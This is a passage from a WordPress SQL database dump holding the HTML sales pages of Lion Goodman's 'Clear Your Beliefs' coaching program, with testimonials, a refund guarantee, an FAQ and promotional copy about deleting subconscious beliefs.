how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n<a name="package"></a>\r\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\r\n\r\n&nbsp;\r\n<h1>Purchase Today and You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\r\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\r\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\r\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\r\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\r\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\r\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\r\n<strong>Optional:</strong> Professional Coaching Sessions.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\r\n<p style="text-align: center">OR</p>\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\r\n\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Praise for Lion and Clear Your Beliefs</h1>\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<strong>– G. J., software developer</strong>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<strong>~ T. L., Healer, Stamford, CT </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<strong>~ C.T., Performance and Life Coach</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<strong>– M.M., International Business Consultant</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\r\n<p style="text-align: center">OR</p>\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\r\n\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 12:23:39', '2014-12-12 17:23:39', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2028, 2, '2014-12-12 16:26:48', '2014-12-12 21:26:48', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n \n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\n \n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n \n<p style="text-align: left"><strong>It''s that simple.</strong></p>\n&nbsp;\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " 